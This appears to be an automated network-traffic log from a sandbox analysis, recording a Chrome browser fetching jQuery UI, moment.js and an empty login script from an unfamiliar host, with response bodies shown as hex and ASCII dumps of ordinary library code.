                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.44979020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:48 UTC391OUTGET /plugins/jquery-ui/jquery-ui.min.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:49 UTC320INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:49 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 253669
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-3dee5"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:49 UTC3776INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 32 2e 31 20 2d 20 32 30 31 36 2d 30 39 2d 31 34 0a 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 65 78 70 6c
                                                      Data Ascii: /*! jQuery UI - v1.12.1 - 2016-09-14* http://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/effect-expl
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 74 68 69 73 2e 63 6c 61 73 73 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 70 72 65 76 22 29 26 26 74 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 70 72 65 76 2d 68 6f 76 65 72 22 29 2c 2d 31 21 3d 3d 74 68 69 73 2e 63 6c 61 73 73 4e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6e 65 78 74 22 29 26 26 74 28 74 68 69 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6e 65 78 74 2d 68 6f 76 65 72 22 29 7d 29 2e 6f 6e 28 22 6d 6f 75 73 65 6f 76 65 72 22 2c 69 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 74 2e 64 61 74 65 70 69 63 6b 65 72 2e 5f 69 73 44 69 73 61 62 6c 65 64 44 61 74
                                                      Data Ascii: this.className.indexOf("ui-datepicker-prev")&&t(this).removeClass("ui-datepicker-prev-hover"),-1!==this.className.indexOf("ui-datepicker-next")&&t(this).removeClass("ui-datepicker-next-hover")}).on("mouseover",i,o)}function o(){t.datepicker._isDisabledDat
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 63 72 65 61 74 65 22 2c 6e 75 6c 6c 2c 74 68 69 73 2e 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 28 29 29 2c 74 68 69 73 2e 5f 69 6e 69 74 28 29 7d 2c 5f 67 65 74 43 72 65 61 74 65 4f 70 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 7d 7d 2c 5f 67 65 74 43 72 65 61 74 65 45 76 65 6e 74 44 61 74 61 3a 74 2e 6e 6f 6f 70 2c 5f 63 72 65 61 74 65 3a 74 2e 6e 6f 6f 70 2c 5f 69 6e 69 74 3a 74 2e 6e 6f 6f 70 2c 64 65 73 74 72 6f 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 28 29 2c 74 2e 65 61 63 68 28 74 68 69 73 2e 63 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 4c 6f 6f 6b 75 70 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 69 29 7b 65 2e 5f 72 65 6d 6f 76 65 43 6c 61 73
                                                      Data Ascii: create",null,this._getCreateEventData()),this._init()},_getCreateOptions:function(){return{}},_getCreateEventData:t.noop,_create:t.noop,_init:t.noop,destroy:function(){var e=this;this._destroy(),t.each(this.classesElementLookup,function(t,i){e._removeClas
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 61 72 20 6e 2c 6f 2c 61 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 65 5d 3b 69 66 28 73 3d 73 7c 7c 7b 7d 2c 69 3d 74 2e 45 76 65 6e 74 28 69 29 2c 69 2e 74 79 70 65 3d 28 65 3d 3d 3d 74 68 69 73 2e 77 69 64 67 65 74 45 76 65 6e 74 50 72 65 66 69 78 3f 65 3a 74 68 69 73 2e 77 69 64 67 65 74 45 76 65 6e 74 50 72 65 66 69 78 2b 65 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 69 2e 74 61 72 67 65 74 3d 74 68 69 73 2e 65 6c 65 6d 65 6e 74 5b 30 5d 2c 6f 3d 69 2e 6f 72 69 67 69 6e 61 6c 45 76 65 6e 74 29 66 6f 72 28 6e 20 69 6e 20 6f 29 6e 20 69 6e 20 69 7c 7c 28 69 5b 6e 5d 3d 6f 5b 6e 5d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2e 74 72 69 67 67 65 72 28 69 2c 73 29 2c 21 28 74 2e 69 73 46 75 6e 63 74 69 6f 6e 28 61 29 26 26 61 2e 61
                                                      Data Ascii: ar n,o,a=this.options[e];if(s=s||{},i=t.Event(i),i.type=(e===this.widgetEventPrefix?e:this.widgetEventPrefix+e).toLowerCase(),i.target=this.element[0],o=i.originalEvent)for(n in o)n in i||(i[n]=o[n]);return this.element.trigger(i,s),!(t.isFunction(a)&&a.a
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 77 69 64 74 68 3a 6c 2c 68 65 69 67 68 74 3a 63 7d 2c 68 6f 72 69 7a 6f 6e 74 61 6c 3a 30 3e 69 3f 22 6c 65 66 74 22 3a 65 3e 30 3f 22 72 69 67 68 74 22 3a 22 63 65 6e 74 65 72 22 2c 76 65 72 74 69 63 61 6c 3a 30 3e 72 3f 22 74 6f 70 22 3a 73 3e 30 3f 22 62 6f 74 74 6f 6d 22 3a 22 6d 69 64 64 6c 65 22 7d 3b 6c 3e 70 26 26 70 3e 61 28 65 2b 69 29 26 26 28 75 2e 68 6f 72 69 7a 6f 6e 74 61 6c 3d 22 63 65 6e 74 65 72 22 29 2c 63 3e 66 26 26 66 3e 61 28 73 2b 72 29 26 26 28 75 2e 76 65 72 74 69 63 61 6c 3d 22 6d 69 64 64 6c 65 22 29 2c 75 2e 69 6d 70 6f 72 74 61 6e 74 3d 6f 28 61 28 65 29 2c 61 28 69 29 29 3e 6f 28 61 28 73 29 2c 61 28 72 29 29 3f 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3a 22 76 65 72 74 69 63 61 6c 22 2c 6e 2e 75 73 69 6e 67 2e 63 61 6c 6c 28 74
                                                      Data Ascii: width:l,height:c},horizontal:0>i?"left":e>0?"right":"center",vertical:0>r?"top":s>0?"bottom":"middle"};l>p&&p>a(e+i)&&(u.horizontal="center"),c>f&&f>a(s+r)&&(u.vertical="middle"),u.important=o(a(e),a(i))>o(a(s),a(r))?"horizontal":"vertical",n.using.call(t
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 2a 28 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 73 2a 2c 5c 73 2a 28 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 25 5c 73 2a 2c 5c 73 2a 28 5c 64 2b 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 25 5c 73 2a 28 3f 3a 2c 5c 73 2a 28 5c 64 3f 28 3f 3a 5c 2e 5c 64 2b 29 3f 29 5c 73 2a 29 3f 5c 29 2f 2c 73 70 61 63 65 3a 22 68 73 6c 61 22 2c 70 61 72 73 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 5b 74 5b 31 5d 2c 74 5b 32 5d 2f 31 30 30 2c 74 5b 33 5d 2f 31 30 30 2c 74 5b 34 5d 5d 7d 7d 5d 2c 6c 3d 74 2e 43 6f 6c 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 2c 73 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 74 2e 43 6f 6c 6f 72 2e 66 6e 2e 70 61 72 73 65 28 65 2c 69 2c 73 2c 6e 29 7d 2c 63 3d 7b 72 67 62 61 3a 7b 70 72 6f 70 73 3a 7b 72 65 64 3a 7b
                                                      Data Ascii: *(\d+(?:\.\d+)?)\s*,\s*(\d+(?:\.\d+)?)\%\s*,\s*(\d+(?:\.\d+)?)\%\s*(?:,\s*(\d?(?:\.\d+)?)\s*)?\)/,space:"hsla",parse:function(t){return[t[1],t[2]/100,t[3]/100,t[4]]}}],l=t.Color=function(e,i,s,n){return new t.Color.fn.parse(e,i,s,n)},c={rgba:{props:{red:{
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 6e 28 65 29 7b 76 61 72 20 69 3d 65 2e 73 70 6c 69 74 28 22 20 22 29 3b 66 28 69 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 69 29 7b 74 2e 63 73 73 48 6f 6f 6b 73 5b 69 5d 3d 7b 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 6f 2c 61 2c 72 3d 22 22 3b 69 66 28 22 74 72 61 6e 73 70 61 72 65 6e 74 22 21 3d 3d 6e 26 26 28 22 73 74 72 69 6e 67 22 21 3d 3d 74 2e 74 79 70 65 28 6e 29 7c 7c 28 6f 3d 73 28 6e 29 29 29 29 7b 69 66 28 6e 3d 6c 28 6f 7c 7c 6e 29 2c 21 64 2e 72 67 62 61 26 26 31 21 3d 3d 6e 2e 5f 72 67 62 61 5b 33 5d 29 7b 66 6f 72 28 61 3d 22 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3d 3d 3d 69 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3a 65 3b 28 22 22 3d 3d 3d 72 7c 7c 22 74 72 61 6e 73 70 61 72 65 6e 74 22 3d 3d 3d 72 29 26 26 61
                                                      Data Ascii: n(e){var i=e.split(" ");f(i,function(e,i){t.cssHooks[i]={set:function(e,n){var o,a,r="";if("transparent"!==n&&("string"!==t.type(n)||(o=s(n)))){if(n=l(o||n),!d.rgba&&1!==n._rgba[3]){for(a="backgroundColor"===i?e.parentNode:e;(""===r||"transparent"===r)&&a
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 6f 70 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 31 5d 29 7c 7c 30 2c 72 69 67 68 74 3a 22 61 75 74 6f 22 3d 3d 3d 6f 5b 32 5d 3f 69 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 32 5d 29 2c 62 6f 74 74 6f 6d 3a 22 61 75 74 6f 22 3d 3d 3d 6f 5b 33 5d 3f 73 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 33 5d 29 2c 6c 65 66 74 3a 70 61 72 73 65 46 6c 6f 61 74 28 6f 5b 34 5d 29 7c 7c 30 7d 7d 74 2e 65 78 70 72 26 26 74 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 26 26 74 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 2e 61 6e 69 6d 61 74 65 64 26 26 28 74 2e 65 78 70 72 2e 66 69 6c 74 65 72 73 2e 61 6e 69 6d 61 74 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 69 29 7b 72 65 74 75 72 6e 21 21 74 28 69 29 2e 64 61 74 61 28 64 29 7c 7c
                                                      Data Ascii: op:parseFloat(o[1])||0,right:"auto"===o[2]?i:parseFloat(o[2]),bottom:"auto"===o[3]?s:parseFloat(o[3]),left:parseFloat(o[4])||0}}t.expr&&t.expr.filters&&t.expr.filters.animated&&(t.expr.filters.animated=function(e){return function(i){return!!t(i).data(d)||
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 64 65 3f 28 72 5b 6c 5d 28 29 2c 61 28 29 29 3a 6e 2e 63 61 6c 6c 28 72 5b 30 5d 2c 73 2c 69 29 3a 28 72 2e 69 73 28 22 3a 68 69 64 64 65 6e 22 29 3f 22 68 69 64 65 22 3d 3d 3d 6c 3a 22 73 68 6f 77 22 3d 3d 3d 6c 29 3f 28 72 5b 6c 5d 28 29 2c 61 28 29 29 3a 6e 2e 63 61 6c 6c 28 72 5b 30 5d 2c 73 2c 61 29 7d 76 61 72 20 73 3d 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 6e 3d 74 2e 65 66 66 65 63 74 73 2e 65 66 66 65 63 74 5b 73 2e 65 66 66 65 63 74 5d 2c 6f 3d 6e 2e 6d 6f 64 65 2c 61 3d 73 2e 71 75 65 75 65 2c 72 3d 61 7c 7c 22 66 78 22 2c 68 3d 73 2e 63 6f 6d 70 6c 65 74 65 2c 6c 3d 73 2e 6d 6f 64 65 2c 63 3d 5b 5d 2c 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 74 28 74 68 69 73 29 2c 73 3d 74 2e 65 66 66 65 63
                                                      Data Ascii: de?(r[l](),a()):n.call(r[0],s,i):(r.is(":hidden")?"hide"===l:"show"===l)?(r[l](),a()):n.call(r[0],s,a)}var s=e.apply(this,arguments),n=t.effects.effect[s.effect],o=n.mode,a=s.queue,r=a||"fx",h=s.complete,l=s.mode,c=[],u=function(e){var i=t(this),s=t.effec
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 69 6f 6e 28 65 2c 69 29 7b 76 61 72 20 73 2c 6e 3d 7b 7d 2c 6f 3d 74 28 74 68 69 73 29 2c 61 3d 65 2e 64 69 72 65 63 74 69 6f 6e 7c 7c 22 76 65 72 74 69 63 61 6c 22 2c 72 3d 22 62 6f 74 68 22 3d 3d 3d 61 2c 68 3d 72 7c 7c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 61 2c 6c 3d 72 7c 7c 22 76 65 72 74 69 63 61 6c 22 3d 3d 3d 61 3b 73 3d 6f 2e 63 73 73 43 6c 69 70 28 29 2c 6e 2e 63 6c 69 70 3d 7b 74 6f 70 3a 6c 3f 28 73 2e 62 6f 74 74 6f 6d 2d 73 2e 74 6f 70 29 2f 32 3a 73 2e 74 6f 70 2c 72 69 67 68 74 3a 68 3f 28 73 2e 72 69 67 68 74 2d 73 2e 6c 65 66 74 29 2f 32 3a 73 2e 72 69 67 68 74 2c 62 6f 74 74 6f 6d 3a 6c 3f 28 73 2e 62 6f 74 74 6f 6d 2d 73 2e 74 6f 70 29 2f 32 3a 73 2e 62 6f 74 74 6f 6d 2c 6c 65 66 74 3a 68 3f 28 73 2e 72 69 67 68 74 2d 73 2e 6c
                                                      Data Ascii: ion(e,i){var s,n={},o=t(this),a=e.direction||"vertical",r="both"===a,h=r||"horizontal"===a,l=r||"vertical"===a;s=o.cssClip(),n.clip={top:l?(s.bottom-s.top)/2:s.top,right:h?(s.right-s.left)/2:s.right,bottom:l?(s.bottom-s.top)/2:s.bottom,left:h?(s.right-s.l


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      45192.168.2.44979320.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:49 UTC645OUTGET /plus/js/custom/login_custom.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:49 UTC311INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:49 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 0
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-0"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      46192.168.2.44979420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:49 UTC639OUTGET /plus/js/custom/moment.js?ver=1606790105 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:49 UTC320INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:49 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 127757
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:05 GMT
                                                      ETag: "5fc5abd9-1f30d"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:49 UTC3776INData Raw: 2f 2f 21 20 6d 6f 6d 65 6e 74 2e 6a 73 0d 0a 2f 2f 21 20 76 65 72 73 69 6f 6e 20 3a 20 32 2e 31 37 2e 31 0d 0a 2f 2f 21 20 61 75 74 68 6f 72 73 20 3a 20 54 69 6d 20 57 6f 6f 64 2c 20 49 73 6b 72 65 6e 20 43 68 65 72 6e 65 76 2c 20 4d 6f 6d 65 6e 74 2e 6a 73 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0d 0a 2f 2f 21 20 6c 69 63 65 6e 73 65 20 3a 20 4d 49 54 0d 0a 2f 2f 21 20 6d 6f 6d 65 6e 74 6a 73 2e 63 6f 6d 0d 0a 0d 0a 3b 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62 61 6c 2c 20 66 61 63 74 6f 72 79 29 20 7b 0d 0a 20 20 20 20 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 20 3d 3d 3d 20 27 6f 62 6a 65 63 74 27 20 26 26 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d
                                                      Data Ascii: //! moment.js//! version : 2.17.1//! authors : Tim Wood, Iskren Chernev, Moment.js contributors//! license : MIT//! momentjs.com;(function (global, factory) { typeof exports === 'object' && typeof module !== 'undefined' ? module.exports =
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 73 4e 6f 77 56 61 6c 69 64 20 3d 20 69 73 4e 6f 77 56 61 6c 69 64 20 26 26 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 61 67 73 2e 63 68 61 72 73 4c 65 66 74 4f 76 65 72 20 3d 3d 3d 20 30 20 26 26 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 61 67 73 2e 75 6e 75 73 65 64 54 6f 6b 65 6e 73 2e 6c 65 6e 67 74 68 20 3d 3d 3d 20 30 20 26 26 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 61 67 73 2e 62 69 67 48 6f 75 72 20 3d 3d 3d 20 75 6e 64 65 66 69 6e 65 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 4f 62 6a 65 63 74 2e 69 73 46 72 6f 7a 65 6e 20 3d 3d 20 6e 75 6c 6c 20 7c 7c 20 21 4f 62 6a 65 63 74 2e 69 73 46 72 6f 7a
                                                      Data Ascii: ) { isNowValid = isNowValid && flags.charsLeftOver === 0 && flags.unusedTokens.length === 0 && flags.bigHour === undefined; } if (Object.isFrozen == null || !Object.isFroz
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 20 20 20 20 20 20 20 20 20 20 61 72 67 20 3d 20 27 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 61 72 67 75 6d 65 6e 74 73 5b 69 5d 20 3d 3d 3d 20 27 6f 62 6a 65 63 74 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 67 20 2b 3d 20 27 5c 6e 5b 27 20 2b 20 69 20 2b 20 27 5d 20 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 6b 65 79 20 69 6e 20 61 72 67 75 6d 65 6e 74 73 5b 30 5d 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 72 67 20 2b 3d 20 6b 65 79 20 2b 20 27 3a 20 27 20 2b 20 61 72 67 75 6d 65 6e 74 73 5b 30 5d 5b 6b 65 79 5d 20 2b 20 27 2c 20 27 3b 0d 0a 20 20 20 20 20 20 20
                                                      Data Ascii: arg = ''; if (typeof arguments[i] === 'object') { arg += '\n[' + i + '] '; for (var key in arguments[0]) { arg += key + ': ' + arguments[0][key] + ', ';
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 74 68 69 73 2e 5f 69 6e 76 61 6c 69 64 44 61 74 65 3b 0d 0a 7d 0d 0a 0d 0a 76 61 72 20 64 65 66 61 75 6c 74 4f 72 64 69 6e 61 6c 20 3d 20 27 25 64 27 3b 0d 0a 76 61 72 20 64 65 66 61 75 6c 74 4f 72 64 69 6e 61 6c 50 61 72 73 65 20 3d 20 2f 5c 64 7b 31 2c 32 7d 2f 3b 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 6f 72 64 69 6e 61 6c 20 28 6e 75 6d 62 65 72 29 20 7b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 6f 72 64 69 6e 61 6c 2e 72 65 70 6c 61 63 65 28 27 25 64 27 2c 20 6e 75 6d 62 65 72 29 3b 0d 0a 7d 0d 0a 0d 0a 76 61 72 20 64 65 66 61 75 6c 74 52 65 6c 61 74 69 76 65 54 69 6d 65 20 3d 20 7b 0d 0a 20 20 20 20 66 75 74 75 72 65 20 3a 20 27 69 6e 20 25 73 27 2c 0d 0a 20 20 20 20 70 61 73 74 20 20 20 3a 20 27 25 73 20 61 67 6f 27 2c 0d 0a 20 20 20
                                                      Data Ascii: this._invalidDate;}var defaultOrdinal = '%d';var defaultOrdinalParse = /\d{1,2}/;function ordinal (number) { return this._ordinal.replace('%d', number);}var defaultRelativeTime = { future : 'in %s', past : '%s ago',
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 6f 6b 65 6e 20 28 74 6f 6b 65 6e 2c 20 70 61 64 64 65 64 2c 20 6f 72 64 69 6e 61 6c 2c 20 63 61 6c 6c 62 61 63 6b 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 66 75 6e 63 20 3d 20 63 61 6c 6c 62 61 63 6b 3b 0d 0a 20 20 20 20 69 66 20 28 74 79 70 65 6f 66 20 63 61 6c 6c 62 61 63 6b 20 3d 3d 3d 20 27 73 74 72 69 6e 67 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 68 69 73 5b 63 61 6c 6c 62 61 63 6b 5d 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 69 66 20 28 74 6f 6b 65 6e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 66 6f 72 6d 61 74 54 6f 6b 65 6e 46 75 6e 63 74 69 6f 6e 73 5b 74 6f 6b 65 6e 5d 20 3d 20 66 75
                                                      Data Ascii: oken (token, padded, ordinal, callback) { var func = callback; if (typeof callback === 'string') { func = function () { return this[callback](); }; } if (token) { formatTokenFunctions[token] = fu
                                                      2025-01-12 23:47:49 UTC4096INData Raw: 27 27 29 2e 72 65 70 6c 61 63 65 28 2f 5c 5c 28 5c 5b 29 7c 5c 5c 28 5c 5d 29 7c 5c 5b 28 5b 5e 5c 5d 5c 5b 5d 2a 29 5c 5d 7c 5c 5c 28 2e 29 2f 67 2c 20 66 75 6e 63 74 69 6f 6e 20 28 6d 61 74 63 68 65 64 2c 20 70 31 2c 20 70 32 2c 20 70 33 2c 20 70 34 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 70 31 20 7c 7c 20 70 32 20 7c 7c 20 70 33 20 7c 7c 20 70 34 3b 0d 0a 20 20 20 20 7d 29 29 3b 0d 0a 7d 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 72 65 67 65 78 45 73 63 61 70 65 28 73 29 20 7b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 73 2e 72 65 70 6c 61 63 65 28 2f 5b 2d 5c 2f 5c 5c 5e 24 2a 2b 3f 2e 28 29 7c 5b 5c 5d 7b 7d 5d 2f 67 2c 20 27 5c 5c 24 26 27 29 3b 0d 0a 7d 0d 0a 0d 0a 76 61 72 20 74 6f 6b 65 6e 73 20 3d 20 7b 7d 3b 0d 0a 0d 0a 66 75 6e 63
                                                      Data Ascii: '').replace(/\\(\[)|\\(\])|\[([^\]\[]*)\]|\\(.)/g, function (matched, p1, p2, p3, p4) { return p1 || p2 || p3 || p4; }));}function regexEscape(s) { return s.replace(/[-\/\\^$*+?.()|[\]{}]/g, '\\$&');}var tokens = {};func
